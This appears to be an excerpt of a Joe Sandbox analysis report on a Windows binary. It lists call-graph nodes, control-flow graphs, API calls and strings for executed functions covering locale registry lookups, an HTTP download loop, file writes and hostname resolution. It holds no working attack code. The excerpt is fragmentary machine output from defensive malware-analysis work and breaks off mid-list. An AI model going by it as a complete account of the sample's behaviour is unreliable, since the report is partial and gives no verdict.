90333->90377 90342 432d44 _memset 90341->90342 90348 432d3f 90341->90348 90398 46b090 90342->90398 90348->90333 90350 432e32 90349->90350 90351 432e34 90349->90351 90350->90333 90351->90350 90352 46a8b1 __setmbcp 4 API calls 90351->90352 90353 432e89 90352->90353 90354 46a8b1 __setmbcp 4 API calls 90353->90354 90354->90350 90356 4378c5 90355->90356 90358 4378c0 90355->90358 90511 437300 90356->90511 90358->90333 90359 437a27 Sleep 90358->90359 90360 437a0b 90358->90360 90364 4379c2 90358->90364 90359->90358 90359->90364 90361 46a8b1 __setmbcp 4 API calls 90360->90361 90362 437a16 90361->90362 90363 46a8b1 __setmbcp 4 API calls 90362->90363 90363->90364 90364->90333 90366 46e2fe 90365->90366 90367 472d3d __getptd 8 API calls 90366->90367 90368 46e303 90367->90368 90374 437880 41 API calls 90368->90374 90375 432d20 36 API calls 90368->90375 90376 432e20 4 API calls 90368->90376 90369 46e30d 90370 46e2a9 73 API calls 90369->90370 90371 46e313 90370->90371 90372 47856d __XcptFilter 7 API calls 90371->90372 90373 46e324 90372->90373 90374->90369 90375->90369 90376->90369 90378 46e2b3 __IsNonwritableInCurrentImage 90377->90378 90379 472cc4 __getptd 7 API calls 90378->90379 90380 46e2cd 90379->90380 90381 46e2e9 RtlExitUserThread 90380->90381 90383 46e2e2 90380->90383 90384 46e2db CloseHandle 90380->90384 90382 46e2f2 90381->90382 90387 472d3d __getptd 8 API calls 90382->90387 90687 472e86 8 API calls 2 library calls 90383->90687 90384->90383 90386 46e2e8 90386->90381 90388 46e303 90387->90388 90394 437880 41 API calls 90388->90394 90395 432d20 36 API calls 90388->90395 90396 432e20 4 API calls 90388->90396 90389 46e30d 90390 46e2a9 71 API calls 90389->90390 90391 46e313 90390->90391 90392 47856d __XcptFilter 7 API calls 90391->90392 90394->90389 90395->90389 90396->90389 90397->90328 90399 432d7e _memset 90398->90399 90400 436d30 90399->90400 90401 4043f0 8 API calls 90400->90401 90402 436d4a 90401->90402 90403 4043f0 8 API calls 90402->90403 90404 436d57 90403->90404 90405 4043f0 8 API calls 90404->90405 90406 436d64 90405->90406 90407 406bf0 15 API calls 90406->90407 90408 436d76 90407->90408 90409 4049d0 _memcpy_s 90408->90409 90512 43731b 90511->90512 90513 437332 _memset _memset 90512->90513 90514 43738e 90513->90514 90515 437395 90514->90515 90519 4373d5 90514->90519 90516 404310 ctype 4 API calls 90515->90516 90517 4373b3 90516->90517 90518 404310 ctype 4 API calls 90517->90518 90522 4373ca 90518->90522 90520 4373fd 90519->90520 90539 43742a 90519->90539 90569 450a5b 5 API calls ctype 90520->90569 90522->90358 90523 43740f 90526 404700 codecvt 4 API calls 90523->90526 90524 437573 90572 436e10 _memset __localtime64 _strftime _printf 90524->90572 90525 437546 90571 450a5b 5 API calls ctype 90525->90571 90527 437417 90526->90527 90531 404700 codecvt 4 API calls 90527->90531 90531->90522 90532 437558 90535 404700 codecvt 4 API calls 90532->90535 90533 437586 90534 4364a0 10 API calls 90533->90534 90541 437655 strtoxq 90534->90541 90536 437560 90535->90536 90540 437514 90539->90540 90559 4361b0 90539->90559 90570 44a5b1 KiUserExceptionDispatcher task 90539->90570 90540->90524 90540->90525 90560 433c80 2 API calls 90559->90560 90567 4361dc 90560->90567 90562 4361e3 90562->90539 90563 43624e _memset _memset 90563->90567 90564 4362f0 _strlen 90564->90567 90565 436343 _strlen 90565->90567 90566 404740 7 API calls codecvt 90566->90567 90567->90562 90567->90563 90567->90564 90567->90565 90567->90566 90568 436396 _strlen 90567->90568 90580 435630 _memset 90567->90580 90568->90567 90569->90523 90571->90532 90572->90533 90584 435698 90580->90584 90581 435824 _strncmp 90586 435769 90581->90586 90584->90581 90585 435738 select 90584->90585 90584->90586 90587 435794 recv 90584->90587 90585->90584 90585->90586 90586->90567 90587->90584 90587->90586 90687->90386 90688 6a6d2010 90689 6a6d201d 90688->90689 90690 6a6d20e0 90688->90690 90710 6a6d24f0 90689->90710 90810 6a6d2410 90710->90810 90713 6a6d2410 105 API calls 90714 6a6d2535 90713->90714 90715 6a6d2410 105 API calls 90714->90715 90716 6a6d254b 90715->90716 90717 6a6d2410 105 API calls 90716->90717 90718 6a6d2561 90717->90718 90719 6a6d2410 105 API calls 90718->90719 90720 6a6d2577 90719->90720 90811 6a6ee09c moneypunct 67 API calls 90810->90811 90812 6a6d2437 _memset _strncpy 90811->90812 90813 6a6fde00 _sprintf 103 API calls 90812->90813 90814 6a6d24a4 90813->90814 90820 6a6e07a0 90814->90820 90817 6a6fd7eb ___ansicp 5 API calls 90818 6a6d24e4 90817->90818 90818->90713 90821 6a6e07a6 90820->90821 90825 6a6e07b5 90820->90825 90826 6a6ee0e1 69 API calls 2 library calls 90821->90826 90823 6a6d24b8 90823->90817 90825->90823 90825->90825 90827 6a6ee232 LocalAlloc RaiseException __EH_prolog3 ctype __CxxThrowException@8 90825->90827 90826->90825 90827->90823

                                                                                  Executed Functions

                                                                                  Function 0BE96404 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186registrystringlibraryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 358 be96404-be96444 GetModuleFileNameA RegOpenKeyExA 359 be96486-be964c9 call be9622c RegQueryValueExA 358->359 360 be96446-be96462 RegOpenKeyExA 358->360 367 be964cb-be964e7 RegQueryValueExA 359->367 368 be964ed-be96507 RegCloseKey 359->368 360->359 361 be96464-be96480 RegOpenKeyExA 360->361 361->359 363 be9650f-be96540 lstrcpyn GetThreadLocale GetLocaleInfoA 361->363 365 be9663f-be96645 363->365 366 be96546-be9654a 363->366 369 be9654c-be96550 366->369 370 be96556-be9656d lstrlen 366->370 367->368 371 be964e9 367->371 369->365 369->370 373 be96572-be96578 370->373 371->368 374 be9657a-be96583 373->374 375 be96585-be9658e 373->375 374->375 376 be9656f 374->376 375->365 377 be96594-be9659b 375->377 376->373 378 be965c9-be965cb 377->378 379 be9659d-be965c7 lstrcpyn LoadLibraryExA 377->379 378->365 380 be965cd-be965d1 378->380 379->378 380->365 381 be965d3-be96607 lstrcpyn LoadLibraryExA 380->381 381->365 382 be96609-be9663d lstrcpyn LoadLibraryExA 381->382 382->365
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,0BEF80AC), ref: 0BE9641F
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0BEF80AC), ref: 0BE9643D
                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,0BEF80AC), ref: 0BE9645B
                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 0BE96479
                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0BE96508,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 0BE964C2
                                                                                  • RegQueryValueExA.ADVAPI32(?,0BE96684,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0BE96508,?,80000001), ref: 0BE964E0
                                                                                  • RegCloseKey.ADVAPI32(?,0BE9650F,00000000,?,?,00000000,0BE96508,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 0BE96502
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 0BE9651F
                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0BE9652C
                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 0BE96532
                                                                                  • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0BE9655D
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0BE965B2
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0BE965C2
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0BE965EE
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 0BE965FE
                                                                                  • lstrcpyn.KERNEL32(?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 0BE96628
                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,00000105,?,00000000,00000002,?,?,00000105,?,00000000,00000003,?), ref: 0BE96638
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4576454799.000000000BE91000.00000020.00000001.01000000.0000000E.sdmp, Offset: 0BE90000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4576422339.000000000BE90000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BEF8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577489239.000000000BF01000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577624342.000000000BF04000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4577655409.000000000BF05000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579334515.000000000BFB3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579380286.000000000BFB5000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579411305.000000000BFB6000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579444791.000000000BFB7000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4579479117.000000000BFB8000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580098133.000000000BFF6000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4580129775.000000000BFF7000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581874737.000000000C0A1000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4581920696.000000000C0A3000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582006869.000000000C0A9000.00000040.00000001.01000000.0000000E.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4582066863.000000000C0AC000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_be90000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                  • API String ID: 1759228003-2375825460
                                                                                  • Opcode ID: 9b04d7b3a3b6f3f40b17d4a987446cf22792c4e4905bb096f6d4f2af6646e097
                                                                                  • Instruction ID: e6b8a93130d5e53a57c3024fb1872645d81632baa3215dbd1ed6aea87bcb7a68
                                                                                  • Opcode Fuzzy Hash: 9b04d7b3a3b6f3f40b17d4a987446cf22792c4e4905bb096f6d4f2af6646e097
                                                                                  • Instruction Fuzzy Hash: 23619371E4020E7EEF10DBE8DC46FEFB7BC9B08704F405196AA04F6181D6B4DA588B61
                                                                                  Function 6A6E4D60 Relevance: 30.2, APIs: 12, Strings: 5, Instructions: 403networkCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 416 6a6e4d60-6a6e4dc9 call 6a7019b0 419 6a6e4dd0-6a6e4df5 select 416->419 420 6a6e4dff-6a6e4e01 419->420 421 6a6e4df7 419->421 424 6a6e5276-6a6e529c call 6a6fd7eb 420->424 422 6a6e4df9-6a6e4dfd 421->422 423 6a6e4e06-6a6e4e1f recv 421->423 422->419 422->420 423->420 425 6a6e4e21-6a6e4e28 423->425 425->420 427 6a6e4e2a-6a6e4e2d 425->427 427->419 429 6a6e4e2f-6a6e4e37 427->429 429->419 430 6a6e4e39-6a6e4e41 429->430 430->419 431 6a6e4e43-6a6e4e4b 430->431 431->419 432 6a6e4e4d-6a6e4e55 431->432 432->419 433 6a6e4e5b-6a6e4e8d call 6a6fea23 432->433 433->420 437 6a6e4e93-6a6e4ed7 call 6a7000d8 433->437 437->420 440 6a6e4edd-6a6e4ee5 437->440 441 6a6e504c-6a6e5063 call 6a6fe710 440->441 442 6a6e4eeb-6a6e4f0c call 6a6e4600 440->442 441->420 449 6a6e5069-6a6e5089 call 6a7000d8 441->449 447 6a6e4f12-6a6e4f22 call 6a7006e6 442->447 448 6a6e5021-6a6e5040 442->448 447->448 455 6a6e4f28-6a6e4f2e 447->455 448->441 452 6a6e5042-6a6e5047 448->452 449->420 456 6a6e508f-6a6e50a8 449->456 452->441 455->448 457 6a6e4f34-6a6e4f54 call 6a6e54c0 455->457 460 6a6e50aa-6a6e50af 456->460 461 6a6e50b5-6a6e50c1 456->461 464 6a6e4f5b-6a6e4f6b call 6a7006e6 457->464 465 6a6e4f56-6a6e4f59 457->465 460->420 460->461 461->420 463 6a6e50c7-6a6e50cb 461->463 466 6a6e50cd-6a6e50d0 463->466 467 6a6e50d8-6a6e50df 463->467 478 6a6e4f6d-6a6e4f70 464->478 479 6a6e4f72-6a6e4f74 464->479 468 6a6e4f76-6a6e4f7a 465->468 466->467 469 6a6e50d2-6a6e50d5 466->469 467->420 470 6a6e50e5-6a6e50ec 467->470 473 6a6e4f7e-6a6e4f80 468->473 474 6a6e4f7c 468->474 469->467 470->420 475 6a6e50f2-6a6e50f7 470->475 480 6a6e4ffe-6a6e5015 473->480 481 6a6e4f82-6a6e4fc4 call 6a6e54f0 call 6a7019b0 call 6a6e55a0 call 6a6e5620 473->481 474->473 476 6a6e50f9-6a6e5102 call 6a6ee0d6 475->476 477 6a6e5105-6a6e5115 call 6a6ee0cb 475->477 476->477 489 6a6e5117-6a6e5122 call 6a7019b0 477->489 490 6a6e5124 477->490 478->468 479->468 480->448 484 6a6e5017-6a6e501c 480->484 509 6a6e4fc6-6a6e4fce 481->509 484->448 493 6a6e5126-6a6e512b 489->493 490->493 497 6a6e512d-6a6e5138 call 6a7019b0 493->497 498 6a6e513b-6a6e513f 493->498 497->498 501 6a6e5141-6a6e5183 call 6a7019b0 select 498->501 507 6a6e5189 501->507 508 6a6e5272 501->508 510 6a6e518b-6a6e518f 507->510 511 6a6e5196-6a6e51b2 recv 507->511 508->424 509->509 512 6a6e4fd0-6a6e4fec 509->512 510->501 513 6a6e5191 510->513 511->508 516 6a6e51b8 511->516 514 6a6e4fee-6a6e4ff3 512->514 515 6a6e4ff8-6a6e4ffc 512->515 513->508 514->515 515->480 517 6a6e51be-6a6e51c3 516->517 518 6a6e529d-6a6e52a3 516->518 521 6a6e51dc-6a6e525b call 6a703940 517->521 522 6a6e51c5-6a6e51d9 call 6a709c20 517->522 519 6a6e52ad-6a6e52b1 518->519 520 6a6e52a5-6a6e52ab 518->520 519->508 520->519 524 6a6e526d 520->524 521->501 528 6a6e5261-6a6e5267 521->528 522->521 524->508 528->501 528->524
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset_strncmp_swscanfrecvselect
                                                                                  • String ID: Content-Range: bytes $Content-Range: bytes %I64d-%I64d/%I64d$HTTP/$HTTP/%f %d $http://
                                                                                  • API String ID: 1488473753-4277459499
                                                                                  • Opcode ID: cbff3338ef556bbc404b4fb808700e9364ef7e4608b5aca104d69e1862ab248c
                                                                                  • Instruction ID: 8f3322be52fa15ce484bc363e55f1185bf11bf4487f505a54c33d59bf5f6d3bc
                                                                                  • Opcode Fuzzy Hash: cbff3338ef556bbc404b4fb808700e9364ef7e4608b5aca104d69e1862ab248c
                                                                                  • Instruction Fuzzy Hash: 37E1A0B160E7409FD360CF68C984A9BB7F5BBC5318F514A2DF19687281EB71E809CB52
                                                                                  Function 6A6E0900 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 197fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 529 6a6e0900-6a6e09fe call 6a6fde00 CreateFileA 532 6a6e0a16-6a6e0a18 529->532 533 6a6e0a00-6a6e0a0d GetFileSize 529->533 536 6a6e0b4d-6a6e0b65 call 6a6fd7eb 532->536 534 6a6e0a0f-6a6e0a10 CloseHandle 533->534 535 6a6e0a1d-6a6e0a4f SetFilePointer ReadFile 533->535 534->532 535->534 537 6a6e0a51-6a6e0ab2 call 6a7019b0 call 6a6fde00 535->537 544 6a6e0ab4-6a6e0abb 537->544 545 6a6e0abd 544->545 546 6a6e0ac2-6a6e0ac9 544->546 545->546 547 6a6e0acb 546->547 548 6a6e0ad0-6a6e0ad7 546->548 547->548 549 6a6e0ade-6a6e0ae5 548->549 550 6a6e0ad9 548->550 551 6a6e0aec-6a6e0af3 549->551 552 6a6e0ae7 549->552 550->549 553 6a6e0afa-6a6e0b00 551->553 554 6a6e0af5 551->554 552->551 553->544 555 6a6e0b02-6a6e0b08 553->555 554->553 556 6a6e0b0a-6a6e0b20 SetFilePointer 555->556 557 6a6e0b22-6a6e0b37 SetFilePointer 555->557 558 6a6e0b38-6a6e0b47 WriteFile FlushFileBuffers CloseHandle 556->558 557->558 558->536
                                                                                  APIs
                                                                                  • _sprintf.LIBCMT ref: 6A6E09DA
                                                                                  • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000080,00000000,?,?), ref: 6A6E09F3
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 6A6E0A02
                                                                                  • CloseHandle.KERNEL32(00000000,?,?), ref: 6A6E0A10
                                                                                  • SetFilePointer.KERNELBASE(00000000,-00000004,00000000,00000000,?,?), ref: 6A6E0A24
                                                                                  • ReadFile.KERNELBASE(00000000,?,00000004,?,00000000,?,?), ref: 6A6E0A47
                                                                                  • _memset.LIBCMT ref: 6A6E0A60
                                                                                  • _sprintf.LIBCMT ref: 6A6E0AA3
                                                                                  • SetFilePointer.KERNELBASE(00000000,-00000004,00000000,00000000), ref: 6A6E0B0C
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 6A6E0B24
                                                                                  • WriteFile.KERNELBASE(00000000,?,00000004,?,00000000), ref: 6A6E0B39
                                                                                  • FlushFileBuffers.KERNEL32(00000000), ref: 6A6E0B40
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 6A6E0B47
                                                                                  Strings
                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789, xrefs: 6A6E0924
                                                                                  • %c%c, xrefs: 6A6E09CE
                                                                                  • dwSize is : %d, last is : %d-%d-%d-%d, new is : %d-%d-%d-%d, xrefs: 6A6E0A9D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.4589268596.000000006A6D1000.00000020.00000001.01000000.00000014.sdmp, Offset: 6A6D0000, based on PE: true
                                                                                  • Associated: 00000002.00000002.4589234021.000000006A6D0000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590024637.000000006A717000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72A000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A72E000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590255562.000000006A732000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590392286.000000006A734000.00000020.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4590458587.000000006A738000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591074825.000000006A772000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591118011.000000006A773000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591208517.000000006A77A000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591244526.000000006A77B000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591279266.000000006A77C000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591312102.000000006A77D000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.4591345778.000000006A77E000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_6a6d0000_D74384FB8D2C9.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Pointer$CloseHandle_sprintf$BuffersCreateFlushReadSizeWrite_memset
                                                                                  • String ID: %c%c$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789$dwSize is : %d, last is : %d-%d-%d-%d, new is : %d-%d-%d-%d
                                                                                  • API String ID: 1255100760-368882477
                                                                                  • Opcode ID: 761571c983ef2af7491e77ab2dcdcc4ae0171cfb712749f6324ccbae3ccbceda
                                                                                  • Instruction ID: c673641a34a6da2fe9895337e760508f6da8abbb3bb52265eb71ddaada7cdd40
                                                                                  • Opcode Fuzzy Hash: 761571c983ef2af7491e77ab2dcdcc4ae0171cfb712749f6324ccbae3ccbceda
                                                                                  • Instruction Fuzzy Hash: DB610C6110C3D05ED315DB748C84B6FBFE99FCA308F08492CF5D5D6182DA69CA098B67
                                                                                  Function 6A6E3C40 Relevance: 19.7, APIs: 10, Strings: 1, Instructions: 417networkCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 920 6a6e3c40-6a6e3c9f call 6a6f123e 923 6a6e3cab-6a6e3cc2 920->923 924 6a6e3ca1-6a6e3ca6 call 6a6dea00 920->924 927 6a6e3cc6-6a6e3cca 923->927 924->923 928 6a6e3ccc-6a6e3ce3 927->928 929 6a6e3ce5-6a6e3cfc 927->929 930 6a6e3d02-6a6e3d23 call 6a6ff945 call 6a6fe2fd call 6a6fe30f 928->930 929->930 937 6a6e3d25-6a6e3d2b 930->937 938 6a6e3d2d 937->938 939 6a6e3d32-6a6e3d35 937->939 938->939 940 6a6e3d3d-6a6e3d40 939->940 941 6a6e3d37-6a6e3d3b 939->941 942 6a6e40fa-6a6e40fe 940->942 943 6a6e3d46-6a6e3d48 940->943 941->937 941->940 945 6a6e4120-6a6e413f 942->945 946 6a6e4100-6a6e4105 942->946 943->930 944 6a6e3d4a-6a6e3d7d call 6a7019b0 943->944 956 6a6e3d80-6a6e3d88 944->956 947 6a6e414b-6a6e4150 945->947 948 6a6e4141-6a6e4146 945->948 950 6a6e4108-6a6e410d 946->950 951 6a6e41b1-6a6e41d4 call 6a6fd7eb 947->951 948->947 950->950 953 6a6e410f-6a6e4111 950->953 953->945 954 6a6e4113-6a6e411b 953->954 954->927 956->956 958 6a6e3d8a-6a6e3d8f 956->958 959 6a6e3d90-6a6e3d95 958->959 959->959 960 6a6e3d97-6a6e3d9f 959->960 961 6a6e3dc1-6a6e3dc5 960->961 962 6a6e3da1-6a6e3da3 960->962 963 6a6e3dc7-6a6e3dcc 961->963 962->961 964 6a6e3da5-6a6e3dad 962->964 963->963 965 6a6e3dce-6a6e3dd7 963->965 966 6a6e3db0-6a6e3db6 964->966 968 6a6e3dd8-6a6e3dde 965->968 966->966 967 6a6e3db8-6a6e3dbe 966->967 967->961 968->968 969 6a6e3de0-6a6e3e56 call 6a7019b0 * 2 call 6a6e46c0 968->969 976 6a6e3e5c-6a6e3e79 call 6a6f1774 969->976 977 6a6e3d00 969->977 980 6a6e3e80-6a6e3e92 call 6a6f181b 976->980 977->930 983 6a6e3e98-6a6e3ebd WSAStartup gethostbyname 980->983 984 6a6e3f85-6a6e3f92 call 6a6e39a0 980->984 985 6a6e3ebf-6a6e3ec9 WSACleanup 983->985 986 6a6e3ecb-6a6e3ed2 983->986 990 6a6e3f97-6a6e3f9f 984->990 985->980 988 6a6e3ed4 986->988 989 6a6e3f11-6a6e3f35 WSACleanup call 6a6e4600 986->989 991 6a6e3ed6-6a6e3f0f call 6a709c20 inet_ntoa call 6a6f1a9c 988->991 1002 6a6e3f37-6a6e3f39 989->1002 1003 6a6e3f75-6a6e3f80 989->1003 992 6a6e40e4-6a6e40f5 call 6a6f1951 990->992 993 6a6e3fa5-6a6e3fc3 call 6a6e4600 990->993 991->989 992->977 1006 6a6e3fc5-6a6e3fc7 993->1006 1007 6a6e4003-6a6e400a 993->1007 1008 6a6e3f3f-6a6e3f41 1002->1008 1009 6a6e4152 call 6a6ee232 1002->1009 1004 6a6e400e-6a6e401e 1003->1004 1011 6a6e402a-6a6e4032 1004->1011 1012 6a6e4020-6a6e4025 1004->1012 1006->1009 1015 6a6e3fcd-6a6e3fcf 1006->1015 1007->1004 1008->1009 1010 6a6e3f47-6a6e3f73 call 6a6e4280 * 2 1008->1010 1017 6a6e4157-6a6e418a call 6a6f1951 1009->1017 1010->1002 1010->1003 1018 6a6e40cc-6a6e40ce 1011->1018 1019 6a6e4038-6a6e403a 1011->1019 1012->1011 1015->1009 1020 6a6e3fd5-6a6e4001 call 6a6e4280 * 2 1015->1020 1033 6a6e418c-6a6e418e 1017->1033 1034 6a6e41a1-6a6e41a3 1017->1034 1018->1017 1022 6a6e40d4-6a6e40d9 1018->1022 1019->1009 1024 6a6e4040-6a6e4042 1019->1024 1020->1006 1020->1007 1022->992 1028 6a6e40db-6a6e40df 1022->1028 1024->1009 1030 6a6e4048-6a6e407d call 6a6e47a0 call 6a6e52c0 1024->1030 1028->980 1043 6a6e4082-6a6e4088 1030->1043 1037 6a6e419a-6a6e419f 1033->1037 1038 6a6e4190-6a6e4195 1033->1038 1040 6a6e41af 1034->1040 1041 6a6e41a5-6a6e41aa 1034->1041 1037->951 1038->1037 1040->951 1041->1040 1044 6a6e408a-6a6e409e call 6a6e49a0 1043->1044 1045 6a6e40a2-6a6e40c8 call 6a6e49a0 1043->1045 1044->1019 1050 6a6e40a0 1044->1050 1045->1018 1050->1018
                                                                                  APIs
                                                                                  • __time64.LIBCMT ref: 6A6E3D05
                                                                                  • _rand.LIBCMT ref: 6A6E3D16
                                                                                  • _memset.LIBCMT ref: 6A6E3D6A
                                                                                  • _memset.LIBCMT ref: 6A6E3E0D
